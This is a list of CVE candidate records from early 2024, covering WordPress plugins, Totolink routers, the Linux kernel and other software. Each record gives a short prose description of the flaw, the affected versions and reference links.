CVE 2024 596 Candidate The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve Assigned (20240116)
CVE 2024 595 Candidate The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails. MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765 | URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve Assigned (20240116)
CVE 2024 594 Candidate The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279 | URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279 | MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765 | URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve Assigned (20240116)
CVE 2024 593 Candidate The Simple Job Board plugin for WordPress is vulnerable to unauthorized access of data| due to insufficient authorization checking on the fetch_quick_job() function in all versions up to, and including, 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information. MISC:https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php | URL:https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve Assigned (20240116)
CVE 2024 592 Candidate The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the handle_create_link() function. This makes it possible for unauthenticated attackers to add related posts to other posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This ultimately makes it possible for attackers to view draft and password protected posts. MISC:https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70 | URL:https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70 | MISC:https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php | URL:https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve Assigned (20240116)
CVE 2024 591 Candidate The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/ | URL:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/ | MISC:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php | URL:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve Assigned (20240116)
CVE 2024 590 Candidate The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve Assigned (20240116)
CVE 2024 589 Candidate Cross-site scripting (XSS) vulnerability in the entry overview tab in Devolutions Remote Desktop Manager 2023.3.36 and earlier on Windows allows an attacker with access to a data source to inject a malicious script via a specially crafted input in an entry. MISC:https://devolutions.net/security/advisories/DEVO-2024-0001/ | URL:https://devolutions.net/security/advisories/DEVO-2024-0001/ Assigned (20240116)
CVE 2024 587 Candidate The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html | URL:https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve Assigned (20240116)
CVE 2024 586 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php | URL:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve Assigned (20240116)
CVE 2024 585 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php | URL:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve Assigned (20240116)
CVE 2024 584 Candidate ** REJECT ** Do not use this CVE as it is duplicate of CVE-2023-6932 Assigned (20240116)
CVE 2024 582 Candidate A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system. MISC:RHBZ#2254050 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2254050 | MISC:https://access.redhat.com/security/cve/CVE-2024-0582 | URL:https://access.redhat.com/security/cve/CVE-2024-0582 | MISC:https://bugs.chromium.org/p/project-zero/issues/detail?id=2504 | URL:https://bugs.chromium.org/p/project-zero/issues/detail?id=2504 | MISC:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d | URL:https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d Assigned (20240116)
CVE 2024 581 Candidate An Uncontrolled Resource Consumption vulnerability has been found on Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/uncontrolled-resource-consumption-vulnerability-sandsprite-scdbg Assigned (20240116)
CVE 2024 580 Candidate Omission of user-controlled key authorization in the IDMSistemas platform, affecting the QSige product. This vulnerability allows an attacker to extract sensitive information from the API by making a request to the parameter '/qsige.locator/quotePrevious/centers/X', where X supports values 1,2,3, etc. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/omission-key-controlled-authorization-qsige Assigned (20240116)
CVE 2024 579 Candidate A vulnerability classified as critical was found in Totolink X2000R 1.0.0-B20221212.1452. Affected by this vulnerability is the function formMapDelDevice of the file /boafrm/formMapDelDevice. The manipulation of the argument macstr leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250795. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/X2000R/1/README.md | MISC:https://vuldb.com/?ctiid.250795 | URL:https://vuldb.com/?ctiid.250795 | MISC:https://vuldb.com/?id.250795 | URL:https://vuldb.com/?id.250795 Assigned (20240116)
CVE 2024 578 Candidate A vulnerability classified as critical has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function UploadCustomModule of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument File leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250794 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/8/README.md | MISC:https://vuldb.com/?ctiid.250794 | URL:https://vuldb.com/?ctiid.250794 | MISC:https://vuldb.com/?id.250794 | URL:https://vuldb.com/?id.250794 Assigned (20240116)
CVE 2024 577 Candidate A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been rated as critical. This issue affects the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument lang leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250793 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/7/README.md | MISC:https://vuldb.com/?ctiid.250793 | URL:https://vuldb.com/?ctiid.250793 | MISC:https://vuldb.com/?id.250793 | URL:https://vuldb.com/?id.250793 Assigned (20240116)
CVE 2024 576 Candidate A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been declared as critical. This vulnerability affects the function setIpPortFilterRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sPort leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250792. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/6/README.md | MISC:https://vuldb.com/?ctiid.250792 | URL:https://vuldb.com/?ctiid.250792 | MISC:https://vuldb.com/?id.250792 | URL:https://vuldb.com/?id.250792 Assigned (20240116)
CVE 2024 575 Candidate A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/5/README.md | MISC:https://vuldb.com/?ctiid.250791 | URL:https://vuldb.com/?ctiid.250791 | MISC:https://vuldb.com/?id.250791 | URL:https://vuldb.com/?id.250791 Assigned (20240116)
CVE 2024 574 Candidate A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/4/README.md | MISC:https://vuldb.com/?ctiid.250790 | URL:https://vuldb.com/?ctiid.250790 | MISC:https://vuldb.com/?id.250790 | URL:https://vuldb.com/?id.250790 Assigned (20240116)
CVE 2024 573 Candidate A vulnerability has been found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this vulnerability is the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ip leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250789 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/3/README.md | MISC:https://vuldb.com/?ctiid.250789 | URL:https://vuldb.com/?ctiid.250789 | MISC:https://vuldb.com/?id.250789 | URL:https://vuldb.com/?id.250789 Assigned (20240116)
CVE 2024 572 Candidate A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/2/README.md | MISC:https://vuldb.com/?ctiid.250788 | URL:https://vuldb.com/?ctiid.250788 | MISC:https://vuldb.com/?id.250788 | URL:https://vuldb.com/?id.250788 Assigned (20240116)
CVE 2024 571 Candidate A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md | URL:https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/1/README.md | MISC:https://vuldb.com/?ctiid.250787 | URL:https://vuldb.com/?ctiid.250787 | MISC:https://vuldb.com/?id.250787 | URL:https://vuldb.com/?id.250787 Assigned (20240116)
CVE 2024 570 Candidate A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability. MISC:https://drive.google.com/file/d/1xmGHvjMTaOn7v6buju5Ifuti3q47G7yF/view?usp=sharing | URL:https://drive.google.com/file/d/1xmGHvjMTaOn7v6buju5Ifuti3q47G7yF/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250786 | URL:https://vuldb.com/?ctiid.250786 | MISC:https://vuldb.com/?id.250786 | URL:https://vuldb.com/?id.250786 Assigned (20240116)
CVE 2024 569 Candidate A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability. MISC:https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing | URL:https://drive.google.com/file/d/1WSWrGEKUkvPk8hq1VRng-wbR7T6CknGY/view?usp=sharing | MISC:https://vuldb.com/?ctiid.250785 | URL:https://vuldb.com/?ctiid.250785 | MISC:https://vuldb.com/?id.250785 | URL:https://vuldb.com/?id.250785 Assigned (20240116)
CVE 2024 568 Candidate CWE-287: Improper Authentication vulnerability exists that could cause unauthorized tampering of device configuration over NFC communication. MISC:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf | URL:https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2024-044-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2024-044-02.pdf Assigned (20240116)
CVE 2024 567 Candidate A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack. MISC:RHBZ#2258544 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258544 | MISC:RHSA-2024:0533 | URL:https://access.redhat.com/errata/RHSA-2024:0533 | MISC:RHSA-2024:1082 | URL:https://access.redhat.com/errata/RHSA-2024:1082 | MISC:http://www.openwall.com/lists/oss-security/2024/01/19/3 | URL:http://www.openwall.com/lists/oss-security/2024/01/19/3 | MISC:https://access.redhat.com/security/cve/CVE-2024-0567 | URL:https://access.redhat.com/security/cve/CVE-2024-0567 | MISC:https://gitlab.com/gnutls/gnutls/-/issues/1521 | URL:https://gitlab.com/gnutls/gnutls/-/issues/1521 | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7ZEIOLORQ7N6WRPFXZSYDL2MC4LP7VFV/ | MISC:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/ | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/ | MISC:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html | URL:https://lists.gnupg.org/pipermail/gnutls-help/2024-January/004841.html | MISC:https://security.netapp.com/advisory/ntap-20240202-0011/ | URL:https://security.netapp.com/advisory/ntap-20240202-0011/ Assigned (20240116)
CVE 2024 566 Candidate The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. MISC:https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/ | URL:https://wpscan.com/vulnerability/ca83db95-4a08-4615-aa8d-016022404c32/ Assigned (20240115)
CVE 2024 565 Candidate An out-of-bounds memory read flaw was found in receive_encrypted_standard in fs/smb/client/smb2ops.c in the SMB Client sub-component in the Linux Kernel. This issue occurs due to integer underflow on the memcpy length, leading to a denial of service. MISC:RHBZ#2258518 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258518 | MISC:RHSA-2024:1188 | URL:https://access.redhat.com/errata/RHSA-2024:1188 | MISC:RHSA-2024:1404 | URL:https://access.redhat.com/errata/RHSA-2024:1404 | MISC:https://access.redhat.com/security/cve/CVE-2024-0565 | URL:https://access.redhat.com/security/cve/CVE-2024-0565 | MISC:https://security.netapp.com/advisory/ntap-20240223-0002/ | URL:https://security.netapp.com/advisory/ntap-20240223-0002/ | MISC:https://www.spinics.net/lists/stable-commits/msg328851.html | URL:https://www.spinics.net/lists/stable-commits/msg328851.html Assigned (20240115)
CVE 2024 564 Candidate A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is "max page sharing=256", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's "max page share". Through these operations, the attacker can leak the victim's page. MISC:RHBZ#2258514 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258514 | MISC:https://access.redhat.com/security/cve/CVE-2024-0564 | URL:https://access.redhat.com/security/cve/CVE-2024-0564 | MISC:https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513 | URL:https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513 | MISC:https://link.springer.com/conference/wisa | URL:https://link.springer.com/conference/wisa | MISC:https://wisa.or.kr/accepted | URL:https://wisa.or.kr/accepted Assigned (20240115)
CVE 2024 563 Candidate Denial of service condition in M-Files Server in versions before 24.2 (excluding 23.2 SR7 and 23.8 SR5) allows anonymous user to cause denial of service against other anonymous users. MISC:https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/ | URL:https://www.m-files.com/about/trust-center/security-advisories/cve-2024-0563/ Assigned (20240115)
CVE 2024 562 Candidate A use-after-free flaw was found in the Linux Kernel. When a disk is removed, bdi_unregister is called to stop further write-back and waits for associated delayed work to complete. However, wb_inode_writeback_end() may schedule bandwidth estimation work after this has completed, which can result in the timer attempting to access the recently freed bdi_writeback. MISC:RHBZ#2258475 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258475 | MISC:RHSA-2024:0412 | URL:https://access.redhat.com/errata/RHSA-2024:0412 | MISC:https://access.redhat.com/security/cve/CVE-2024-0562 | URL:https://access.redhat.com/security/cve/CVE-2024-0562 | MISC:https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/ | URL:https://patchwork.kernel.org/project/linux-mm/patch/20220801155034.3772543-1-khazhy@google.com/ Assigned (20240115)
CVE 2024 561 Candidate The Ultimate Posts Widget WordPress plugin before 2.3.1 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/ | URL:https://wpscan.com/vulnerability/99b6aa8b-deb9-48f8-8896-f3c8118a4f70/ Assigned (20240115)
CVE 2024 560 Candidate A vulnerability was found in 3Scale, when used with Keycloak 15 (or RHSSO 7.5.0) and superiors. When the auth_type is use_3scale_oidc_issuer_endpoint, the Token Introspection policy discovers the Token Introspection endpoint from the token_introspection_endpoint field, but the field was removed on RH-SSO 7.5. As a result, the policy doesn't inspect tokens, it determines that all tokens are valid. MISC:RHBZ#2258456 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258456 | MISC:https://access.redhat.com/security/cve/CVE-2024-0560 | URL:https://access.redhat.com/security/cve/CVE-2024-0560 | MISC:https://github.com/3scale/APIcast/pull/1438 | URL:https://github.com/3scale/APIcast/pull/1438 Assigned (20240115)
CVE 2024 559 Candidate The Enhanced Text Widget WordPress plugin before 1.6.6 does not validate and escape some of its Widget options before outputting them back in attributes, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) MISC:https://research.cleantalk.org/cve-2024-0559/ | URL:https://research.cleantalk.org/cve-2024-0559/ | MISC:https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/ | URL:https://wpscan.com/vulnerability/b257daf2-9540-4a0f-a560-54b47d2b913f/ Assigned (20240115)
CVE 2024 558 Candidate A vulnerability has been found in DedeBIZ 6.3.0 and classified as critical. This vulnerability affects unknown code of the file /admin/makehtml_freelist_action.php. The manipulation of the argument startid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250726 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md | URL:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20sqli%201/README.md | MISC:https://vuldb.com/?ctiid.250726 | URL:https://vuldb.com/?ctiid.250726 | MISC:https://vuldb.com/?id.250726 | URL:https://vuldb.com/?id.250726 Assigned (20240115)
CVE 2024 557 Candidate A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md | URL:https://github.com/JTZ-a/SRC/blob/master/DedeBIZ/DedeBIZ%20-%20StoredXSS/README.md | MISC:https://vuldb.com/?ctiid.250725 | URL:https://vuldb.com/?ctiid.250725 | MISC:https://vuldb.com/?id.250725 | URL:https://vuldb.com/?id.250725 Assigned (20240115)
